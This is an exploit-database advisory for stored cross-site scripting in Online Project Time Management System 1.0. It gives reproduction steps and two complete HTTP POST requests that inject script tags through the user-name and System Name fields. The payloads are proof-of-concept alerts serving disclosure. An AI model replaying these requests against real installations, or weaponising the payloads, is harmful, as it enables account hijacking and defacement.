Online Project Time Management System 1.0 Multiple Stored Cross Site Scripting (XSS) (Authenticated)

2022.02.02
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Online Project Time Management System 1.0 - Multiple Stored XSS (Authenticated) # Date: 19/01/2022 # Exploit Author: Felipe Alcantara (Filiplain) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: Kali Linux # Description: Stored XSS in multiple fields... # Steps to reproduce (with employee Access) # Log in as an employee # Go to : http://localhost/ptms/?page=user # Add XSS payload to any field of the user's name. #Click Update ================= POST /ptms/classes/Users.php?f=save_employee HTTP/1.1 Host: localhost Content-Length: 1339 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvsLkAfaBC64Uzoak Origin: http://localhost Referer: http://localhost/ptms/?page=user Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm Connection: close ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="id" 4 ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="code" 2022-0003 ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="generated_password" ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="firstname" Mark ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="middlename" <script>alert("XSS_TEST")</script> ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="lastname" Cooper ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="gender" Male ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="department" IT Department ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="position" Department Manager ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="email" mcooper@sample.com ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="password" ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryvsLkAfaBC64Uzoak-- ================= ----------------------------------------------------------------------------- # Steps to reproduce (with Admin access) # Log in to the admin panel # Go to : http://localhost/ptms/admin/?page=system_info # Add XSS payload to the 'System Name' field #Click Update ================= POST /ptms/classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: localhost Content-Length: 603 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCibB6pEzThjb4Zcq Origin: http://localhost Referer: http://localhost/ptms/admin/?page=system_info Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm Connection: close ------WebKitFormBoundaryCibB6pEzThjb4Zcq Content-Disposition: form-data; name="name" Online Project Time Management System - PHP <script>alert("XSS")</script> ------WebKitFormBoundaryCibB6pEzThjb4Zcq Content-Disposition: form-data; name="short_name" PTMS - PHP ------WebKitFormBoundaryCibB6pEzThjb4Zcq Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryCibB6pEzThjb4Zcq Content-Disposition: form-data; name="cover"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryCibB6pEzThjb4Zcq-- =================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top